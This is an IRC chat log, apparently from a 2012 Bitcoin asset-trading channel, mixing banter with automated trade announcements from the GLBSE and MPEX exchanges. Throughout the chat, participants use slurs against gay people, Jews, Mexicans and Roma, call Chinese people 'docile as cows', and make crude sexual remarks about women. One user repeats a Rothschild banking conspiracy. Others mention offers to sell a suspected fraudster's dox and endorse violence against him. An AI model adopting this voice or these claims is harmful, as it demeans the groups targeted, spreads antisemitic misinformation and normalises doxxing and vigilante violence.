lmao Aug 22 17:30:13 the billing system would send me an email every time Aug 22 17:30:18 saying they paid but it wasnt enough Aug 22 17:30:21 over and over and over Aug 22 17:30:36 this is what you get for hating on fags and jews. Aug 22 17:30:48 they mix your coins? Aug 22 17:30:53 how is that sweet revenge? Aug 22 17:30:57 maybe they shouldn't have started world war 2 then Aug 22 17:31:20 i floss almost every day but my gums still bleed Aug 22 17:31:31 rg: It's the food you are eating. Aug 22 17:31:36 oh mircea, floss is a piece of string used to clean the middle of your teeth Aug 22 17:31:49 [GLBSE] [GMVT-BOT] 1 @ 0.1 BTC [+] Aug 22 17:32:02 you use it after you brush or as romanians might know it.. rubbing a tree branch against your teeth Aug 22 17:32:19 [GLBSE] [BMMO] 100 @ 0.0796 = 7.96 BTC [-] Aug 22 17:32:30 we have floss here Aug 22 17:32:40 it's used to make that part of the bikini that goes in front of the girl's cunt. Aug 22 17:32:55 thats why their teethis so bad and their vag smells Aug 22 17:33:14 haters everywhere! Aug 22 17:33:20 what the hell am I reading Aug 22 17:33:25 using candy floss to clean your teeth and cover your genitals isn't that smart Aug 22 17:33:41 like using leaves for money Aug 22 17:33:52 you wonder why you have so much inflation every autumn? Aug 22 17:33:57 Anyways, you guys need to leave whatever European shithole you're in now. It's all about to go downhill. Aug 22 17:34:01 aghaha good one Aug 22 17:34:08 EmanuelDeOrtego nah, romania will be fine. Aug 22 17:34:17 it's too backwards to follow the trends. Aug 22 17:34:22 it's still 2007ish here. Aug 22 17:34:22 Romania always rebounds Aug 22 17:34:36 sure its not glamorous or switzerlan Aug 22 17:34:43 but they always stay level Aug 22 17:34:55 hard to fall off the floor. Aug 22 17:34:59 I guess their constant supply of porn and vodka is doing them well Aug 22 17:34:59 lol Aug 22 17:35:03 [GLBSE] [BMMO] 2 @ 0.08 = 0.16 BTC [+] Aug 22 17:35:12 actually budapest is the world capital of porn Aug 22 17:35:20 or was, years back. i think the czechs are taking over. Aug 22 17:35:43 (once on a open air shoot in prague a dude was doing this model tied to a bench Aug 22 17:35:49 in a park. people were passiong by Aug 22 17:35:54 [GLBSE] [BMMO] 22 @ 0.1 = 2.2 BTC [+] Aug 22 17:35:55 I loved budapest Aug 22 17:36:01 such a nice city Aug 22 17:36:01 Okay, that's an awesome country. Aug 22 17:36:02 at some point two kids sat next to them and the girl stripped Aug 22 17:36:05 and they went at it. Aug 22 17:36:12 lol Aug 22 17:36:32 cameraman can be heard going Aug 22 17:36:38 "shit they'll drive us out of business" Aug 22 17:37:21 [10:33] hard to fall off the floor. Aug 22 17:37:22 I don't understand how the porn industry can continue Aug 22 17:37:22 lol Aug 22 17:37:24 that made me laugh Aug 22 17:37:28 there is so much free stuff Aug 22 17:37:33 nefario honestly, me either. it makes no sense. Aug 22 17:37:42 by people who just want their 20 secs of "fame" Aug 22 17:37:44 tho prices/values have dropped off significantly Aug 22 17:37:53 what is MPEX? Aug 22 17:37:55 porn actors used to get thousands of dollars Aug 22 17:37:58 now they get a few hundred Aug 22 17:38:04 a day Aug 22 17:38:06 oeaud it's a stock exchange for btc assets Aug 22 17:38:21 different from glbse? Aug 22 17:38:21 rg yea a scene is now 500 tops. used to be closer to 1k solo. Aug 22 17:38:26 oeaud yes. Aug 22 17:38:33 yeah Aug 22 17:38:40 imagine those fake casting girls Aug 22 17:38:43 they probably get like $400 Aug 22 17:38:52 [GLBSE] [DMC] 2 @ 0.052 = 0.104 BTC [+] Aug 22 17:38:53 is there a website? Aug 22 17:38:58 actually they probably get more Aug 22 17:39:02 yes oeaud http://polimedia.us/bitcoin/mpex.php Aug 22 17:39:11 rg, they still need to pay tax Aug 22 17:39:12 http://polimedia.us/bitcoin/mpex.php?mpsic=S.BVPS Aug 22 17:39:14 there you go Aug 22 17:39:14 thanks Aug 22 17:39:15 rg i tihnk most of the girls by now are actually shooting for a stripper/call girl career Aug 22 17:39:19 [GLBSE] [BMMO] 90 @ 0.11 = 9.9 BTC [+] Aug 22 17:39:24 just want the tape to advertise themselves. Aug 22 17:39:25 definitely lots of money in escorting Aug 22 17:39:34 lol Aug 22 17:39:37 that's not going away. Aug 22 17:39:43 i considered getting an escort for prom Aug 22 17:39:48 why not Aug 22 17:39:53 sister was busy ? Aug 22 17:39:58 i dont have a sister Aug 22 17:40:01 make one. Aug 22 17:40:13 i had a step sister Aug 22 17:40:21 but she had a gross vagina Aug 22 17:40:23 canibal rg, ate his step sister. Aug 22 17:40:28 there is also plenty to be made from the male escort business Aug 22 17:40:29 http://images.zap2it.com/images/movie-36163/deuce-bigalow-european-gigolo-18.jpg Aug 22 17:40:34 is that what you do up in new hampershire ? Aug 22 17:40:46 lmao wasn't that the title of some film ? Aug 22 17:40:53 ja Aug 22 17:41:22 favourite quote from the film "go ahead, drop your toothpick into my volcano" Aug 22 17:41:29 lmao Aug 22 17:41:33 no escort ever says that. Aug 22 17:41:36 bitcoin-assets - romanian whores Aug 22 17:41:49 That's what this has been reduced to Aug 22 17:41:53 [GLBSE] [ASICMINER] 50 @ 0.098 = 4.9 BTC [-] Aug 22 17:42:02 EmanuelDeOrtego if you can't beep them join them.' Aug 22 17:42:41 [MPEX] [S.MPOE] 1597 @ 0.00038342 = 0.6123 BTC [-] Aug 22 17:42:43 [MPEX] [S.MPOE] 59500 @ 0.00038096 = 22.6671 BTC [-] Aug 22 17:42:44 [MPEX] [S.MPOE] 38903 @ 0.00038072 = 14.8112 BTC [-] Aug 22 17:42:48 mircea_popescu: it was an uber fat black woman eating some chicken Aug 22 17:42:59 lol Aug 22 17:43:00 she was saying it to him Aug 22 17:43:09 him being the gigalo Aug 22 17:43:18 sounds like rg's thing, this. you hear rg ? chicken, boy! Aug 22 17:43:21 chicken! Aug 22 17:43:41 Now this is getting hilariously racist. Aug 22 17:43:52 quiet beaner Aug 22 17:43:55 rg is mexican, why racist ? Aug 22 17:44:08 http://i2.kym-cdn.com/photos/images/original/000/352/749/e44.gif Aug 22 17:44:11 im *gasp* romanian Aug 22 17:44:16 x.x Aug 22 17:44:26 fucken gyp. stole mah nationalitah Aug 22 17:45:04 http://i.imgur.com/rm1TM.gif Aug 22 17:45:20 nope Aug 22 17:45:29 EmanuelDeOrtego: what foods make your gums bleed Aug 22 17:45:31 and why Aug 22 17:45:38 nails Aug 22 17:45:43 lol Aug 22 17:45:46 my concentration is fucking shot Aug 22 17:45:48 rg: Corn syrup Aug 22 17:45:49 .g gum bleed Aug 22 17:45:51 mircea_popescu: http://www.nlm.nih.gov/medlineplus/ency/article/003062.htm Aug 22 17:45:52 and sugar Aug 22 17:45:53 and shit Aug 22 17:46:54 [GLBSE] [MERGEDMINING] 23 @ 0.0935 = 2.1505 BTC [+] Aug 22 17:46:56 [GLBSE] [MERGEDMINING] 177 @ 0.09399 = 16.6362 BTC [+] Aug 22 17:47:06 [GLBSE] [KRAKEN] 90 @ 0.01 = 0.9 BTC Aug 22 17:50:09 http://www.youtube.com/watch?feature=player_embedded&v=jVrCKk45cZQ Aug 22 17:51:05 [GLBSE] [BIF.5-10.MININGBOND] 35 @ 0.35 = 12.25 BTC [+] Aug 22 17:51:07 [GLBSE] [BIF.5-10.MININGBOND] 30 @ 0.4 = 12 BTC [+] Aug 22 17:51:38 [GLBSE] [ASICMINER] 49 @ 0.098 = 4.802 BTC [-] Aug 22 17:52:22 so mircea_popescu, are you a pimp? Aug 22 17:52:26 in the literal sense? Aug 22 17:52:30 no. Aug 22 17:53:32 meh Aug 22 17:53:43 would have been more interesting if this was trie Aug 22 17:53:45 true Aug 22 17:53:55 aww, sorry to dissapoint. Aug 22 17:54:21 mircea_popescu: I am disappoint Aug 22 17:54:33 you're dissapoimpkind ? Aug 22 17:54:36 [GLBSE] [YARR] 4 @ 0.99999998 = 4 BTC [+] Aug 22 17:55:13 yes! Aug 22 17:55:20 anyway, somewhat related : the news from russia is that some crazed chicks went and cut a troika down with a chainsaw while being naked Aug 22 17:55:29 and got convicted to prison. this is apparently an int'l scandal. Aug 22 17:56:00 [MPEX] [F.GIGA.ETF] 4838 @ 0.00102582 = 4.9629 BTC [+] Aug 22 17:56:01 [MPEX] [F.GIGA.ETF] 6218 @ 0.00102668 = 6.3839 BTC [+] Aug 22 17:56:14 You know, Putin really doesn't do much as long you live him alone. Aug 22 17:56:20 i know. Aug 22 17:56:22 as you* Aug 22 17:56:53 but i mean if this is ok then what's the limit ? Aug 22 17:56:58 EmanuelDeOrtego: unless you're a bear Aug 22 17:57:00 no chainsaws on other people's property ffs. Aug 22 17:57:08 then he'll pick a fight with you and wrestle you with his bear hands Aug 22 17:57:08 troika? Aug 22 17:57:09 bare Aug 22 17:57:20 lol bear hands Aug 22 17:57:21 nefario a sort of cross monument thing Aug 22 17:57:28 ah Aug 22 17:57:33 [GLBSE] [BDT] 1 @ 1.028 BTC [-] Aug 22 17:57:35 like a wooden cross basically. Aug 22 17:57:40 The fact is the Internationalists fear Russia Aug 22 17:57:47 they fear China as well Aug 22 17:57:53 They are too independent Aug 22 17:58:01 who are the internationalists? Aug 22 17:58:11 UN, Nato, US, Israel, EU Aug 22 17:58:32 ??? Aug 22 17:58:39 you mean the west? Aug 22 17:58:49 Yes, but more specific Aug 22 17:58:50 well no cause he's in brazil Aug 22 17:58:55 Ew no Aug 22 17:58:56 [GLBSE] [YARR] 1 @ 0.99999998 BTC [+] Aug 22 17:58:59 I am in Texas Aug 22 17:58:59 as far as he's concerned the Pacific is "the west" Aug 22 17:59:09 o rly ? Aug 22 17:59:16 Anyways, China and Russia still have independent, non-rothschild owned banks Aug 22 17:59:25 ah Aug 22 17:59:26 I see Aug 22 17:59:27 They are off the western grid. Aug 22 17:59:28 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC Aug 22 17:59:37 [GLBSE] [FPGAMINING] 1 @ 0.97 BTC [+] Aug 22 17:59:46 can't really speak for russia as I stopped caring about them when the soviet union collapsed Aug 22 17:59:49 but for china Aug 22 17:59:54 it's no international threat Aug 22 18:00:01 not even competition wise Aug 22 18:00:07 do tell ? Aug 22 18:00:12 place is a big shithole Aug 22 18:00:17 hahaha. details. Aug 22 18:00:21 no one here has an independent thought Aug 22 18:00:27 [MPEX] [S.MPOE] 8997 @ 0.00038072 = 3.4253 BTC [-] Aug 22 18:00:29 [MPEX] [S.MPOE] 7500 @ 0.00037944 = 2.8458 BTC [-] Aug 22 18:00:30 [MPEX] [S.MPOE] 34421 @ 0.00037881 = 13.039 BTC [-] Aug 22 18:00:35 that bad eh ? graham was saying the same thing Aug 22 18:00:57 they basically spread corruption whereever they go Aug 22 18:01:14 the place is so corrupt it is AMAZING that it doesn't collapse Aug 22 18:01:24 corruption isn't nearly the bad thing it's made outto be. Aug 22 18:01:31 and I am constantly amazed at how much shit ordinary chinese people take Aug 22 18:01:40 i'd rather live in 1920s mob run NY than in 2020s federal run ny Aug 22 18:01:47 and then I think of what ordinary chinese people are like Aug 22 18:01:52 and then Im not amazed anymore Aug 22 18:02:00 how are they like ? Aug 22 18:02:07 cows Aug 22 18:02:11 doscile as cows Aug 22 18:02:26 and i thought americans are docile... Aug 22 18:02:42 Well, China has yet to be controlled by a central power Aug 22 18:02:46 I admire that fact alone Aug 22 18:02:49 EmanuelDeOrtego it was. england. Aug 22 18:02:55 [GLBSE] [YABMC] 10 @ 0.1314 = 1.314 BTC [+] Aug 22 18:02:58 Well, not at this time. Aug 22 18:02:59 and Japan Aug 22 18:03:01 but yeah Aug 22 18:03:08 and japan, if you consider them a central power Aug 22 18:03:11 which by rights you should. Aug 22 18:03:24 Japan doesn't even have a military anymore Aug 22 18:03:29 so ? Aug 22 18:03:32 neither has the eu Aug 22 18:03:39 [GLBSE] [CHEAPERINBITCOINS-STOCKS] 4 @ 0.289 = 1.156 BTC [-] Aug 22 18:03:40 they're having too good a time fucking their own people to let anyone else get a chance Aug 22 18:03:41 [GLBSE] [CHEAPERINBITCOINS-STOCKS] 1 @ 0.28999 BTC [+] Aug 22 18:03:42 [GLBSE] [BIB.PIRATE] 15 @ 0.45 = 6.75 BTC [+] Aug 22 18:03:52 nefario so basically i'd love china. Aug 22 18:03:55 mircea_popescu: the EU isn't a country Aug 22 18:04:12 not yet. i think they'll get there, about as much as the us is a country. Aug 22 18:04:17 you like attractive, naiive girls? Aug 22 18:04:33 no, i like masses that aren't too uppity and corrupt aka weak government. Aug 22 18:04:51 the governemtn here isn't weak Aug 22 18:04:56 girls i can carry with if need be Aug 22 18:04:58 it's corrupt but aint weak Aug 22 18:05:03 well ya, that's my problem with the place atm Aug 22 18:05:06 otherwise i'd be there. Aug 22 18:05:18 anywawy if your white there are girls falling out of teh sky for you Aug 22 18:05:32 theyre not worth anything though Aug 22 18:05:34 kinda the same all over, im like skinny and apparently exotic. Aug 22 18:05:38 I am going to stick with Texas. We still have the right to secede. Aug 22 18:05:44 jhaha you mean that as a pimp nefario ? Aug 22 18:05:49 [GLBSE] [TYGRR.BOND-PI] 31 @ 1 = 31 BTC [+] Aug 22 18:05:55 EmanuelDeOrtego beaten woman has the right to divorce. so ? Aug 22 18:05:56 I mean that as a man Aug 22 18:06:05 well what's wrong with em Aug 22 18:06:12 lol Aug 22 18:06:17 they're not worth much Aug 22 18:06:23 the women Aug 22 18:06:29 they look pretty but thats about it Aug 22 18:06:38 they have no vaginal openings ? Aug 22 18:06:39 [GLBSE] [BITBOND] 4 @ 0.46 = 1.84 BTC [-] Aug 22 18:06:47 they don't know what to do wit hthe cock ? they can't speak ? Aug 22 18:06:58 what's teh deffect Aug 22 18:07:44 I am going to be sexist and say that if they clean and cook for you... Aug 22 18:07:48 It's not all bad. Aug 22 18:08:10 i like cooking Aug 22 18:08:20 I eat raw steaks. Aug 22 18:08:26 I never believed in cooking too much. Aug 22 18:08:28 ya but we're not talking texas. Aug 22 18:08:35 lol Aug 22 18:08:43 i;m romanian, we taught the french how to make wine. Aug 22 18:08:51 and the italians how to make cheese Aug 22 18:08:54 therefore... cuisine! Aug 22 18:09:07 [GLBSE] [MU] 4 @ 0.5001 = 2.0004 BTC [+] Aug 22 18:09:08 [GLBSE] [MU] 2 @ 0.5 = 1 BTC [-] Aug 22 18:09:09 [GLBSE] [MU] 1 @ 0.499 BTC [-] Aug 22 18:09:32 ha, I should visit Romania for the food then. Aug 22 18:09:50 [GLBSE] [ASICMINER] 50 @ 0.098 = 4.9 BTC [-] Aug 22 18:09:50 food is pretty good, but it's much better if you find a girl that can cook. Aug 22 18:09:55 restaurants are mostly dubious. Aug 22 18:10:20 [MPEX] [S.MPOE] 19400 @ 0.00040049 = 7.7695 BTC [+] Aug 22 18:10:26 [GLBSE] [KRAKEN] 16 @ 0.01 = 0.16 BTC Aug 22 18:11:27 mkay, time to cap this nonsense. Aug 22 18:13:38 [GLBSE] [OBSI.HRPT] 10 @ 0.10485 = 1.0485 BTC [-] Aug 22 18:14:50 [GLBSE] [PUREMINING] 1 @ 0.132 BTC [-] Aug 22 18:14:57 [GLBSE] [BITCOINMINV] 20 @ 0.124 = 2.48 BTC [-] Aug 22 18:16:04 [GLBSE] [DMC] 4 @ 0.052 = 0.208 BTC [+] Aug 22 18:16:06 [GLBSE] [BIB.PIRATE] 23 @ 0.35 = 8.05 BTC [-] Aug 22 18:18:34 [GLBSE] [COGNITIVE] 5 @ 0.6501 = 3.2505 BTC [-] Aug 22 18:18:36 [GLBSE] [COGNITIVE] 5 @ 0.65 = 3.25 BTC [-] Aug 22 18:18:36 does anyone know where satoshidice servers are? Aug 22 18:18:47 isle of man? Aug 22 18:21:22 thanks Aug 22 18:22:00 lol Aug 22 18:22:02 Really? Aug 22 18:22:13 If so, I am investing Aug 22 18:22:17 Erick knows his shit Aug 22 18:24:21 [GLBSE] [GIGAMINING] 2 @ 0.97001 = 1.94 BTC [-] Aug 22 18:24:22 [GLBSE] [GIGAMINING] 2 @ 0.97 = 1.94 BTC [-] Aug 22 18:24:24 [GLBSE] [GIGAMINING] 4 @ 0.9601 = 3.8404 BTC [-] Aug 22 18:24:25 [GLBSE] [GIGAMINING] 3 @ 0.96 = 2.88 BTC [-] Aug 22 18:24:26 [GLBSE] [GIGAMINING] 5 @ 0.955 = 4.775 BTC [-] Aug 22 18:24:27 [GLBSE] [GIGAMINING] 10 @ 0.954 = 9.54 BTC [-] Aug 22 18:24:29 [GLBSE] [GIGAMINING] 3 @ 0.952 = 2.856 BTC [-] Aug 22 18:24:29 [GLBSE] [GIGAMINING] 5 @ 0.95 = 4.75 BTC [-] Aug 22 18:24:30 [GLBSE] [GIGAMINING] 1 @ 0.941 BTC [-] Aug 22 18:25:30 [GLBSE] [DMC] 15 @ 0.044 = 0.66 BTC [-] Aug 22 18:25:32 [GLBSE] [DMC] 2 @ 0.043 = 0.086 BTC [-] Aug 22 18:25:32 [GLBSE] [DMC] 1 @ 0.042 BTC [-] Aug 22 18:25:33 [GLBSE] [DMC] 22 @ 0.040001 = 0.88 BTC [-] Aug 22 18:25:43 [GLBSE] [GOLD] 2 @ 0.01 = 0.02 BTC [+] Aug 22 18:27:40 [GLBSE] [JAH] 1 @ 0.15 BTC [-] Aug 22 18:28:35 and she's back Aug 22 18:29:18 crashed Aug 22 18:29:24 [GLBSE] [TYGRR.BOND-P] 1 @ 0.457501 BTC [+] Aug 22 18:29:26 [GLBSE] [TYGRR.BOND-P] 5 @ 0.41 = 2.05 BTC [-] Aug 22 18:29:27 [GLBSE] [TYGRR.BOND-P] 1 @ 0.40000001 BTC [-] Aug 22 18:30:34 the second pirate starts paying back nyan.c will double Aug 22 18:30:55 you think he will? Aug 22 18:30:59 almost it's entire worth is now in pirate ppt's at 50 cents on the dollar Aug 22 18:31:00 Dunno Aug 22 18:31:25 He's sticking around Aug 22 18:31:29 you gambling? Aug 22 18:31:33 If he was gonna go, he'd dissapear Aug 22 18:31:40 I'm making an educated guess Aug 22 18:31:46 usagi: Unless he is a sociopath Aug 22 18:31:47 Scammers dissapear Aug 22 18:32:12 I'll know it's bad when people start trying to sell me his dox like they did with jro Aug 22 18:32:14 ahahaha Aug 22 18:32:16 make em say unhhhh Aug 22 18:32:18 unhhhhhhhh Aug 22 18:32:20 ba na na na Aug 22 18:32:22 ba na na na Aug 22 18:33:17 lol Aug 22 18:33:27 how many offered to sell you JRO dox? Aug 22 18:33:56 kakobrekla: you done your BTC transfer system yet Aug 22 18:34:44 2 people Aug 22 18:34:56 lol Aug 22 18:35:02 I already have it tho Aug 22 18:35:05 so I turned them down lol Aug 22 18:35:20 j/k but it isn't like his photo and address isn't on the net Aug 22 18:35:21 [MPEX] [F.GIGA.ETF] 4900 @ 0.00103385 = 5.0659 BTC [+] Aug 22 18:35:26 I know Aug 22 18:35:32 Mine too, if you know where to look Aug 22 18:35:38 my picture is on a KGS profile for one Aug 22 18:35:52 I don't know what people want out of JRO Aug 22 18:35:57 He's broke now from what I heard Aug 22 18:36:46 EmanuelDeOrtego: depends if he defrauded people Aug 22 18:36:56 or used funds for stuff he wasn't supposed to Aug 22 18:36:59 if thats the case Aug 22 18:37:04 then he should go to jail Aug 22 18:37:20 Americans go to jail for financial crimes? Aug 22 18:37:24 That's news to me. Aug 22 18:37:30 failing that Aug 22 18:37:34 violence Aug 22 18:37:49 there has tobe consequences for fucking around with other peoples money Aug 22 18:38:09 Indeed. Aug 22 18:38:20 but at the least there is failure Aug 22 18:38:23 [11:36] That's news to me. Aug 22 18:38:24 pff Aug 22 18:38:26 dont be that way Aug 22 18:38:43 people go to jail for fucking with money all the time Aug 22 18:38:48 some people can afford to make it go away, some cant Aug 22 18:45:38 [GLBSE] [FOO.PPPPT] 2 @ 0.45 = 0.9 BTC [-] Aug 22 18:50:37 you know what movie sucks ass? Aug 22 18:50:40 the hangover Aug 22 18:53:47 Yes Aug 22 18:53:55 I'll never get that time back Aug 22 19:00:07 [MPEX] [S.MPOE] 15806 @ 0.00039327 = 6.216 BTC [-] Aug 22 19:03:32 [MPEX] [F.GIGA.ETF] 1644 @ 0.00103385 = 1.6996 BTC [+] Aug 22 19:03:34 [MPEX] [F.GIGA.ETF] 2982 @ 0.00102202 = 3.0477 BTC [-] Aug 22 19:03:35 [MPEX] [F.GIGA.ETF] 8600 @ 0.00102067 = 8.7778 BTC [-] Aug 22 19:03:36 [MPEX] [F.GIGA.ETF] 683 @ 0.00101865 = 0.6957 BTC [-] Aug 22 19:07:22 http://www.youtube.com/watch?feature=player_detailpage&v=K7aac3k_YuU#t=393s Aug 22 19:11:13 [MPEX] [S.MPOE] 1818 @ 0.00039327 = 0.715 BTC [-] Aug 22 19:12:08 EmanuelDeOrtego erik does know his shit. Aug 22 19:12:36 usagi: Unless he is a sociopath << long scammers usually stick around. why not. Aug 22 19:12:51 Because the scam is over now Aug 22 19:13:05 No one is depositing money, if he was going to take it and run he'd be gone. Aug 22 19:13:07 EmanuelDeOrtego> I don't know what people want out of JRO << a kidney. Aug 22 19:13:14 Hanging around makes little to no sense Aug 22 19:13:30 usagi buys him time at leas.t Aug 22 19:13:37 For what Aug 22 19:13:46 for to have. Aug 22 19:14:02 Why Aug 22 19:14:05 how the fuck would i know that! Aug 22 19:14:12 See? Aug 22 19:14:15 It doesn't make sense. Aug 22 19:14:33 i say it does. Aug 22 19:14:45 time is always valuable. Aug 22 19:15:09 You can say that, but that doesn't make it logical. Aug 22 19:16:58 i don't get what your objection to logic is. guy does something. you say there's no reason for it, i say it buys him time. you say to do what i say i don't know. you infer that there's nothing to do with time from this ? why ? Aug 22 19:17:32 [GLBSE] [ASICMINER] 10 @ 0.098 = 0.98 BTC [-] Aug 22 19:17:36 maybe the airline he used to travel destroys records in 5 days. Aug 22 19:17:40 so he needs 5 days. Aug 22 19:19:04 [GLBSE] [TYGRR.BOND-P] 2 @ 0.615 = 1.23 BTC [+] Aug 22 19:19:47 no Aug 22 19:19:53 that's not even a good conspiracy theory Aug 22 19:19:59 better would be.. Aug 22 19:20:11 he waits until the end of the week Aug 22 19:20:16 then announces that BS&T was hacked Aug 22 19:20:53 ahahaha Aug 22 19:20:57 that will be SO kickass. Aug 22 19:21:08 thank god we dont host 'em anymore Aug 22 19:21:17 that would be the icing on the cake, if he blamed a 5 million dollar loss on bitvps Aug 22 19:23:58 leotreasure: I believe you have recently tried to contact me? Aug 22 19:24:21 (what a strange place for me to put a '?') Aug 22 19:24:39 lolz Aug 22 19:24:56 http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/191941_437763806267310_682470091_o.jpg Aug 22 19:25:24 [GLBSE] [FZB.A] 10 @ 0.0331 = 0.331 BTC [-] Aug 22 19:26:41 [GLBSE] [FPGAMINING] 4 @ 0.9501 = 3.8004 BTC [-] Aug 22 19:26:43 [GLBSE] [FPGAMINING] 5 @ 0.95 = 4.75 BTC [-] Aug 22 19:26:44 [GLBSE] [FPGAMINING] 13 @ 0.9451 = 12.2863 BTC [-] Aug 22 19:26:45 [GLBSE] [FPGAMINING] 1 @ 0.94 BTC [-] Aug 22 19:26:48 [GLBSE] [FPGAMINING] 5 @ 0.936 = 4.68 BTC [-] Aug 22 19:26:49 [GLBSE] [FPGAMINING] 1 @ 0.92 BTC [-] Aug 22 19:26:50 [GLBSE] [FPGAMINING] 2 @ 0.911 = 1.822 BTC [-] Aug 22 19:26:51 [GLBSE] [FPGAMINING] 39 @ 0.9 = 35.1 BTC [-] Aug 22 19:27:26 [GLBSE] [GIGAMINING] 3 @ 1.02 = 3.06 BTC [+] Aug 22 19:28:18 hey! Aug 22 19:28:25 [GLBSE] [OBSI.HRPT] 10 @ 0.10485 = 1.0485 BTC [-] Aug 22 19:28:27 howdy Aug 22 19:29:44 [GLBSE] [OBSI.HRPT] 30 @ 0.1035 = 3.105 BTC [-] Aug 22 19:29:45 [GLBSE] [OBSI.HRPT] 10 @ 0.1031 = 1.031 BTC [-] Aug 22 19:29:47 [GLBSE] [OBSI.HRPT] 60 @ 0.103002 = 6.1801 BTC [-] Aug 22 19:32:55 damn, what happened with ZETA-MINING? Aug 22 19:32:59 what ? Aug 22 19:33:35 832 shares sold at 0.00171 Aug 22 19:33:54 The weekly div is around 0.0031 Aug 22 19:34:06 I am putting an actual venture capital fund on GLBSE that isn't cryptic as all hell. Aug 22 19:34:14 VersaCoin will be changing the Bitcoin world. Aug 22 19:36:52 [GLBSE] [OBSI.HRPT] 1 @ 0.10485 BTC [+] Aug 22 19:37:54 EmanuelDeOrtego what's the market cap ? Aug 22 19:38:12 $50,000 for the near future Aug 22 19:38:36 We will reach that goal while maintaining share value Aug 22 19:38:42 not gonna change any worlds with 50k. Aug 22 19:38:50 It's a start. Aug 22 19:38:52 1mn minimum to play. Aug 22 19:39:11 If I went on GLBSE asking for a million outright Aug 22 19:39:15 it would be laughed off Aug 22 19:39:30 it would have to be, lol. Aug 22 19:40:35 no Aug 22 19:40:39 I'm somewhere else Aug 22 19:40:40 sup? Aug 22 19:41:03 BTC-Mining that doesn't sound so good. Aug 22 19:41:45 Well shares sold at almost half the weekly div price... no indeed Aug 22 19:42:12 [GLBSE] [BTCWEB] 2 @ 0.1097 = 0.2194 BTC [-] Aug 22 19:43:13 [MPEX] [F.GIGA.ETF] 6100 @ 0.00103109 = 6.2896 BTC [+] Aug 22 19:45:12 [MPEX] [S.MPOE] 12600 @ 0.00039378 = 4.9616 BTC [+] Aug 22 19:46:01 [GLBSE] [BFLS.RIG] 25 @ 0.85 = 21.25 BTC [+] Aug 22 19:46:18 was this on the asset page? Aug 22 19:46:59 dividends are always a bit slow to appear Aug 22 19:47:14 [MPEX] [S.MPOE] 100 @ 0.00039378 = 0.0394 BTC [+] Aug 22 19:47:22 [GLBSE] [BFLS.RIG] 1 @ 0.85 BTC [+] Aug 22 19:47:23 maybe because it distribute it among all outstanding shares and account and takes a few seconds to process Aug 22 19:47:33 btc-mining Aug 22 19:47:34 I refresh within 30 seconds and it usually pops Aug 22 19:47:37 was it you buying pirate debt? Aug 22 19:47:43 Yes, I do Aug 22 19:48:00 ciuciu: asset page is cached Aug 22 19:48:04 well i have 17,000 btc coming, how much will you pay me for it Aug 22 19:48:11 0.o Aug 22 19:48:14 [GLBSE] [CPA] 10 @ 0.082 = 0.82 BTC [-] Aug 22 19:48:17 [GLBSE] [CPA] 1 @ 0.08100001 BTC [-] Aug 22 19:48:17 [GLBSE] [CPA] 9 @ 0.08 = 0.72 BTC [-] Aug 22 19:48:22 rg where you steal that? Aug 22 19:48:27 rg is moving in with the big dogs Aug 22 19:48:30 snitche get switches Aug 22 19:48:44 wow Aug 22 19:48:47 i am such a fucking nred Aug 22 19:48:50 mhm. Aug 22 19:48:50 that i typed switch Aug 22 19:48:51 [GLBSE] [BFLS.RIG] 2 @ 0.85 = 1.7 BTC [+] Aug 22 19:49:08 snitches get stitches Aug 22 19:49:41 How much did you buy that debt for??? Damn... Aug 22 19:49:51 no Aug 22 19:49:53 i want you to buy it Aug 22 19:50:13 I can't buy it all =/ Aug 22 19:50:16 ahahaha Aug 22 19:50:19 rg rulez! Aug 22 19:50:26 Where is it located? Aug 22 19:50:49 inb4 "in btc" Aug 22 19:51:03 [GLBSE] [TYGRR.BOND-PI] 1 @ 1 BTC [+] Aug 22 19:52:37 [GLBSE] [OBSI.HRPT] 8 @ 0.104 = 0.832 BTC [-] Aug 22 19:52:53 [MPEX] [F.GIGA.ETF] 5100 @ 0.00103491 = 5.278 BTC [+] Aug 22 19:52:53 [MPEX] [F.GIGA.ETF] 2600 @ 0.00103833 = 2.6997 BTC [+] Aug 22 19:53:14 http://www.youtube.com/watch?feature=player_embedded&v=0CaYuss28HQ Aug 22 19:53:52 [GLBSE] [YABMC] 1 @ 0.1314 BTC [+] Aug 22 20:00:32 [GLBSE] [PUREMINING] 1 @ 0.13897999 BTC [+] Aug 22 20:06:11 [MPEX] [S.MPOE] 34200 @ 0.00039509 = 13.5121 BTC [+] Aug 22 20:06:12 [MPEX] [S.MPOE] 3100 @ 0.0003992 = 1.2375 BTC [+] Aug 22 20:06:14 [MPEX] [S.MPOE] 7800 @ 0.0004 = 3.12 BTC [+] Aug 22 20:10:58 Buying PPT.X, BIB.PIRATE or TYGGR P Aug 22 20:11:01 Anyone? Aug 22 20:11:10 [GLBSE] [TYGRR.BOND-P] 1 @ 0.40000002 BTC [-] Aug 22 20:20:58 [GLBSE] [BIF.BTCST.PPT] 3 @ 0.5 = 1.5 BTC [+] Aug 22 20:31:44 BTC-Mining i never owned any, but for curiosity, what are the discounts ? Aug 22 20:39:27 lmao o hay! Aug 22 20:41:27 [GLBSE] [TYGRR.BOND-P] 55 @ 0.7189 = 39.5395 BTC [+] Aug 22 20:41:28 [GLBSE] [YABMC] 1 @ 0.128 BTC [+] Aug 22 20:41:59 [GLBSE] [TYGRR.BOND-P] 2 @ 0.7189 = 1.4378 BTC [+] Aug 22 20:42:27 for the record, i had eloped with gribble Aug 22 20:42:33 [GLBSE] [YABMC] 1 @ 0.128 BTC [+] Aug 22 20:42:34 -tomaw- [Global Notice] Hi all. One of our sponsors has some issues at the moment which resulting in a lack of NickServ, ChanServ and friends. We're investigating now! Aug 22 20:42:59 YOU DID WHAT TO GRIBBLE? Aug 22 20:43:02 YOU PERVERT Aug 22 20:43:11 we netsplit to be together! Aug 22 20:43:13 i want to link a freenode server Aug 22 20:43:19 i could Aug 22 20:43:23 rg you should. Aug 22 20:44:14 [GLBSE] [OBSI.1MHS] 50 @ 0.071 = 3.55 BTC [+] Aug 22 20:44:15 [GLBSE] [OBSI.1MHS] 30 @ 0.07 = 2.1 BTC [-] Aug 22 20:44:19 what you figure a server cost for them ? Aug 22 20:45:45 ah Aug 22 20:45:49 got a place in london Aug 22 20:45:50 finally Aug 22 20:46:19 weren't you in china ?! Aug 22 20:47:03 does this mean the GLBSE time will be finally switched to GMT? Aug 22 20:47:19 becuase I dont really get this american hours Aug 22 20:47:23 [GLBSE] [NASTY] 1 